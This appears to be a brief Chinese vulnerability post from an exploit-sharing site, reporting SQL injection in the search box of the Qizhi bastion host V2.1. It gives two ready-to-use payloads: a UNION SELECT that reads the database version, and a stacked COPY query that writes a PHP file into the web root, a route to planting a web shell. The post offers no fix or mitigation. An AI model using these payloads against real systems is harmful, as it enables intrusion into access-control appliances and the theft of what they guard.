奇智堡垒机V2.1存在搜索框注入 作者:hack1990 时间:11-08-02 阅读数:938人阅读 奇智堡垒机存在搜索框注入,通过1%')/**/and/**/1=2/**/union/**/select/**/null,version(),null,null,null,null,null,null— 1%');copy/**/qmsectexts(shell)/**/to/**/'/var/www/shterm/client/secqm.php'—进行写文件了,写入测试文件后,我们发现文件成功写入。 漏洞证明 # Nmap Security Scanner 7.0 上一篇:eWebeditoR3.8 for php任意文件上传EXP 下一篇:风讯dotNETCMS 1.0 SP5XSS漏洞
